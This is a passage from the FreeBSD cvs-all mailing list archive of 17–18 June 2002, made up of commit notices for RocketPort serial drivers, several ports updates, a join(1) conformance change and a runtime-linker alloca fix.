Support the Comtrol RocketPort 550 PCi 16. Revision Changes Path 1.2.2.6 +28 -0 src/sys/dev/puc/pucdata.c 1.1.2.2 +1 -1 src/sys/dev/puc/pucvar.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 20: 5:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B2F1037B40F; Mon, 17 Jun 2002 20:05:13 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I35Bb05316; Mon, 17 Jun 2002 20:05:11 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180305.g5I35Bb05316@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 20:05:10 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/puc pucdata.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 20:05:10 PDT Modified files: sys/dev/puc pucdata.c Log: Add support for Comtrol RocketPort 550 PCi models: 4 RJ45, 4 Quadcable, 8 RJ11, 8 Octacable, and 8 (used with RocketPort I/F box). Note: untested due to lack of hardware Revision Changes Path 1.8 +87 -0 src/sys/dev/puc/pucdata.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 20: 8: 7 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8593537B430; Mon, 17 Jun 2002 20:08:02 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I382B08586; Mon, 17 Jun 2002 20:08:02 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180308.g5I382B08586@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 20:08:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/puc pucdata.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 20:08:02 PDT Modified files: (Branch: RELENG_4) sys/dev/puc pucdata.c Log: MFC: rev 1.8 (support for additional RP 550 models) Revision Changes Path 1.2.2.7 +87 -0 src/sys/dev/puc/pucdata.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 20:11:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8EFE237B429; Mon, 17 Jun 2002 20:11:46 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I3Bkt09235; Mon, 17 Jun 2002 20:11:46 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180311.g5I3Bkt09235@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 20:11:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/rp rp.c rp_isa.c rp_pci.c rpreg.h rpvar.h src/sys/modules/rp Makefile X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 20:11:46 PDT Added files: (Branch: RELENG_4) sys/dev/rp rp.c rp_isa.c rp_pci.c rpreg.h rpvar.h sys/modules/rp Makefile Log: MFC: update Comtrol RocketPort driver (rp) to version 3.02. Newbusify the driver and build as a module. Revision Changes Path 1.45.2.1 +1684 -0 src/sys/dev/rp/rp.c (new) 1.3.2.1 +503 -0 src/sys/dev/rp/rp_isa.c (new) 1.3.2.1 +369 -0 src/sys/dev/rp/rp_pci.c (new) 1.4.2.1 +1015 -0 src/sys/dev/rp/rpreg.h (new) 1.5.2.1 +87 -0 src/sys/dev/rp/rpvar.h (new) 1.3.2.1 +9 -0 src/sys/modules/rp/Makefile (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 20:12:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E5B8337B405; Mon, 17 Jun 2002 20:12:42 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I3Ca009314; Mon, 17 Jun 2002 20:12:36 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180312.g5I3Ca009314@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 20:12:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/modules Makefile X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 20:12:36 PDT Modified files: (Branch: RELENG_4) sys/modules Makefile Log: MFC: build rp(4) as module. Revision Changes Path 1.110.2.53 +1 -0 src/sys/modules/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 20:32: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B0E1437B415; Mon, 17 Jun 2002 20:31:56 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I3VJr10889; Mon, 17 Jun 2002 20:31:19 -0700 (PDT) (envelope-from obrien) Message-Id: <200206180331.g5I3VJr10889@freefall.freebsd.org> From: "David E. O'Brien" Date: Mon, 17 Jun 2002 20:31:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/conf files X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/17 20:31:18 PDT Modified files: (Branch: RELENG_4) sys/conf files Log: Add the nrp(4) driver. This is the newbusified rp(4) driver from 5-CURRENT. Revision Changes Path 1.340.2.105 +3 -0 src/sys/conf/files To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 21:30:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6A66E37B426; Mon, 17 Jun 2002 21:30:34 -0700 (PDT) Received: (from jkoshy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I4S9219629; Mon, 17 Jun 2002 21:28:09 -0700 (PDT) (envelope-from jkoshy) Message-Id: <200206180428.g5I4S9219629@freefall.freebsd.org> From: Joseph Koshy Date: Mon, 17 Jun 2002 21:28:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/ymessenger Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jkoshy 2002/06/17 21:28:09 PDT Modified files: net/ymessenger Makefile Log: Use the appropriate `dd' incantation, and remove the dependency on PERL. Suggested by: Jacques A. Vidrine Revision Changes Path 1.6 +2 -2 ports/net/ymessenger/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 21:38: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 09BFD37B431; Mon, 17 Jun 2002 21:37:57 -0700 (PDT) Received: (from glewis@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I4Zu720852; Mon, 17 Jun 2002 21:35:56 -0700 (PDT) (envelope-from glewis) Message-Id: <200206180435.g5I4Zu720852@freefall.freebsd.org> From: Greg Lewis Date: Mon, 17 Jun 2002 21:35:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fonts/xfontselector/files patch-Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG glewis 2002/06/17 21:35:56 PDT Added files: x11-fonts/xfontselector/files patch-Makefile Log: Unbreak this port by patching the Makefile to use bmake syntax rather than GNU make syntax. Depending on gmake would have been overkill in comparison to how simple the patch was, IMO. Revision Changes Path 1.1 +11 -0 ports/x11-fonts/xfontselector/files/patch-Makefile (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 21:39:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E03D837B409; Mon, 17 Jun 2002 21:39:46 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I4cAx20925; Mon, 17 Jun 2002 21:38:10 -0700 (PDT) (envelope-from pat) Message-Id: <200206180438.g5I4cAx20925@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 21:38:09 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/wmwave/files patch-wmwave.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 21:38:09 PDT Modified files: net/wmwave/files patch-wmwave.c Log: Location change of if_wavelan_ieee.h MFC'd, so fix patch. Reviewed by: maintainer Revision Changes Path 1.4 +5 -10 ports/net/wmwave/files/patch-wmwave.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 21:56:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CBD7637B433; Mon, 17 Jun 2002 21:56:18 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I4u6n22875; Mon, 17 Jun 2002 21:56:06 -0700 (PDT) (envelope-from pat) Message-Id: <200206180456.g5I4u6n22875@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 21:56:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/mimedefang Makefile distinfo pkg-plist ports/mail/mimedefang/files patch-Makefile.in patch-configure patch-init-script.in patch-mimedefang-filter.5.in patch-mimedefang-multiplexor.8.in patch-mimedefang-multiplexor.c patch-mimedefang.8.in patch-mimedefang.pl.8.in ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 21:56:06 PDT Modified files: mail/mimedefang Makefile distinfo pkg-plist mail/mimedefang/files patch-Makefile.in patch-configure patch-init-script.in Added files: mail/mimedefang/files patch-mimedefang-multiplexor.c Removed files: mail/mimedefang/files patch-mimedefang-filter.5.in patch-mimedefang-multiplexor.8.in patch-mimedefang.8.in patch-mimedefang.pl.8.in patch-mimedefang.pl.in Log: Update to 2.15 PR: 39336, 38873 Submitted by: maintainer Revision Changes Path 1.5 +2 -8 ports/mail/mimedefang/Makefile 1.4 +1 -1 ports/mail/mimedefang/distinfo 1.2 +14 -38 ports/mail/mimedefang/files/patch-Makefile.in 1.2 +130 -9 ports/mail/mimedefang/files/patch-configure 1.2 +16 -2 ports/mail/mimedefang/files/patch-init-script.in 1.2 +0 -20 ports/mail/mimedefang/files/patch-mimedefang-filter.5.in (dead) 1.2 +0 -11 ports/mail/mimedefang/files/patch-mimedefang-multiplexor.8.in (dead) 1.1 +44 -0 ports/mail/mimedefang/files/patch-mimedefang-multiplexor.c (new) 1.2 +0 -20 ports/mail/mimedefang/files/patch-mimedefang.8.in (dead) 1.2 +0 -25 ports/mail/mimedefang/files/patch-mimedefang.pl.8.in (dead) 1.2 +0 -22 ports/mail/mimedefang/files/patch-mimedefang.pl.in (dead) 1.4 +3 -0 ports/mail/mimedefang/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 22:14:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C04C737B40C; Mon, 17 Jun 2002 22:14:49 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I5Ene29036; Mon, 17 Jun 2002 22:14:49 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206180514.g5I5Ene29036@freefall.freebsd.org> From: Juli Mallett Date: Mon, 17 Jun 2002 22:14:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/join join.1 join.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/17 22:14:49 PDT Modified files: (Branch: RELENG_4) usr.bin/join join.1 join.c Log: MFC changes to the join(1) utility for SUSv3 conformance, e.g. 0-field support. Revision Changes Path 1.3.2.4 +9 -17 src/usr.bin/join/join.1 1.10.2.1 +53 -32 src/usr.bin/join/join.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 22:29:31 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3CFB537B400; Mon, 17 Jun 2002 22:29:27 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I5TRS30077; Mon, 17 Jun 2002 22:29:27 -0700 (PDT) (envelope-from pat) Message-Id: <200206180529.g5I5TRS30077@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 22:29:27 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/sdts++ Makefile distinfo X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 22:29:27 PDT Modified files: devel/sdts++ Makefile distinfo Log: - Fix and group MASTER_SITES - Update boost libraries to 1.27.0 - Bump PORTREVISION PR: 39226 Submitted by: Erwin Lansing Revision Changes Path 1.4 +9 -6 ports/devel/sdts++/Makefile 1.3 +1 -1 ports/devel/sdts++/distinfo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 22:42:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7799037B40B; Mon, 17 Jun 2002 22:42:33 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I5gXc31644; Mon, 17 Jun 2002 22:42:33 -0700 (PDT) (envelope-from dillon) Message-Id: <200206180542.g5I5gXc31644@freefall.freebsd.org> From: Matt Dillon Date: Mon, 17 Jun 2002 22:42:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/libexec/rtld-elf/alpha reloc.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/17 22:42:33 PDT Modified files: libexec/rtld-elf/alpha reloc.c Log: This is the same alloca() fix as was committed for i386. David O'Brien tested the patch on -stable. Reviewed by: obrien Approved by: jdp MFC after: 3 days Revision Changes Path 1.16 +17 -5 src/libexec/rtld-elf/alpha/reloc.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 22:43: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 58BF037B401; Mon, 17 Jun 2002 22:42:56 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I5gul31699; Mon, 17 Jun 2002 22:42:56 -0700 (PDT) (envelope-from pat) Message-Id: <200206180542.g5I5gul31699@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 22:42:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-wm/bbrun Makefile distinfo ports/x11-wm/bbrun/files patch-Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 22:42:56 PDT Modified files: x11-wm/bbrun Makefile distinfo x11-wm/bbrun/files patch-Makefile Log: Update to 1.3 Submitted by: maintainer Revision Changes Path 1.6 +1 -1 ports/x11-wm/bbrun/Makefile 1.4 +1 -1 ports/x11-wm/bbrun/distinfo 1.2 +16 -20 ports/x11-wm/bbrun/files/patch-Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 23: 1:21 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 73C0437B401; Mon, 17 Jun 2002 23:01:16 -0700 (PDT) Received: (from mbr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I61Gc33516; Mon, 17 Jun 2002 23:01:16 -0700 (PDT) (envelope-from mbr) Message-Id: <200206180601.g5I61Gc33516@freefall.freebsd.org> From: Martin Blapp Date: Mon, 17 Jun 2002 23:01:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/editors/openoffice Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mbr 2002/06/17 23:01:16 PDT Modified files: editors/openoffice Makefile Log: Fix variable Submitted by: Hiromi Kimura Revision Changes Path 1.80 +1 -1 ports/editors/openoffice/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 23:16:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BEBB037B407; Mon, 17 Jun 2002 23:16:47 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I6Glt38857; Mon, 17 Jun 2002 23:16:47 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206180616.g5I6Glt38857@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 23:16:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/security/cyrus-sasl/files Sendmail.README patch-ab X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 23:16:47 PDT Modified files: security/cyrus-sasl/files Sendmail.README patch-ab Log: fix configure on -current update Sendmail.README for sendmail 8.10-8.12 PR: 38646 Submitted by: maintainer Revision Changes Path 1.5 +14 -4 ports/security/cyrus-sasl/files/Sendmail.README 1.14 +12 -9 ports/security/cyrus-sasl/files/patch-ab To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 23:27:57 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B61B37B403; Mon, 17 Jun 2002 23:27:53 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I6Rrf39941; Mon, 17 Jun 2002 23:27:53 -0700 (PDT) (envelope-from dougb) Message-Id: <200206180627.g5I6Rrf39941@freefall.freebsd.org> From: Doug Barton Date: Mon, 17 Jun 2002 23:27:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/edonkey-gui-gtk Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/17 23:27:53 PDT Modified files: net/edonkey-gui-gtk Makefile Log: Fix BROKEN message. Pointy hat to: lioux PR: ports/39453 Submitted by: Edwin Groothuis Revision Changes Path 1.5 +1 -1 ports/net/edonkey-gui-gtk/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 23:28:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 376C837B41B; Mon, 17 Jun 2002 23:28:37 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I6Sb840082; Mon, 17 Jun 2002 23:28:37 -0700 (PDT) (envelope-from pat) Message-Id: <200206180628.g5I6Sb840082@freefall.freebsd.org> From: Patrick Li Date: Mon, 17 Jun 2002 23:28:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/maradns Makefile distinfo pkg-plist ports/net/maradns/files maradns.sh.sample patch-configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/17 23:28:37 PDT Modified files: net/maradns Makefile distinfo pkg-plist Added files: net/maradns/files maradns.sh.sample patch-configure Log: - Update to 0.9.92 - Add startup script and reword configure message Based on PR: ports/38921 Submitted by: Alex Kapranoff Revision Changes Path 1.20 +4 -2 ports/net/maradns/Makefile 1.19 +1 -1 ports/net/maradns/distinfo 1.1 +20 -0 ports/net/maradns/files/maradns.sh.sample (new) 1.1 +15 -0 ports/net/maradns/files/patch-configure (new) 1.13 +1 -0 ports/net/maradns/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 23:35: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D8E9A37B413; Mon, 17 Jun 2002 23:35:01 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I6Z1W41509; Mon, 17 Jun 2002 23:35:01 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206180635.g5I6Z1W41509@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 23:35:01 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net Makefile ports/net/p5-BIND-Conf_Parser Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 23:35:01 PDT Modified files: net Makefile Added files: net/p5-BIND-Conf_Parser Makefile distinfo pkg-comment pkg-descr pkg-plist Log: add p5-BIND-Conf_Parser 0.95 Perl5 module to parse BIND 8 configuration files PR: 39455 Submitted by: Andrew Revision Changes Path 1.788 +1 -0 ports/net/Makefile 1.1 +22 -0 ports/net/p5-BIND-Conf_Parser/Makefile (new) 1.1 +1 -0 ports/net/p5-BIND-Conf_Parser/distinfo (new) 1.1 +1 -0 ports/net/p5-BIND-Conf_Parser/pkg-comment (new) 1.1 +9 -0 ports/net/p5-BIND-Conf_Parser/pkg-descr (new) 1.1 +4 -0 ports/net/p5-BIND-Conf_Parser/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 23:35:19 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BF7CC37B406; Mon, 17 Jun 2002 23:35:03 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I6Z3Y41541; Mon, 17 Jun 2002 23:35:03 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206180635.g5I6Z3Y41541@freefall.freebsd.org> From: Ying-Chieh Liao Date: Mon, 17 Jun 2002 23:35:03 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/17 23:35:03 PDT Modified files: . modules Log: p5-BIND-Conf_Parser --> ports/net/p5-BIND-Conf_Parser Revision Changes Path 1.5376 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 23:43:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 07C7D37B40B; Mon, 17 Jun 2002 23:43:12 -0700 (PDT) Received: (from hrs@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I6hCT42698; Mon, 17 Jun 2002 23:43:12 -0700 (PDT) (envelope-from hrs) Message-Id: <200206180643.g5I6hCT42698@freefall.freebsd.org> From: Hiroki Sato Date: Mon, 17 Jun 2002 23:43:11 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/ja_JP.eucJP/books/faq book.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG hrs 2002/06/17 23:43:11 PDT Modified files: ja_JP.eucJP/books/faq book.sgml Log: Fix a typo. Pointed out by: Kimura Fuyuki References: [doc-jp-work 402] Revision Changes Path 1.48 +1 -1 doc/ja_JP.eucJP/books/faq/book.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 0: 5:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 03FE137B411; Tue, 18 Jun 2002 00:05:53 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I75qZ49329; Tue, 18 Jun 2002 00:05:52 -0700 (PDT) (envelope-from dougb) 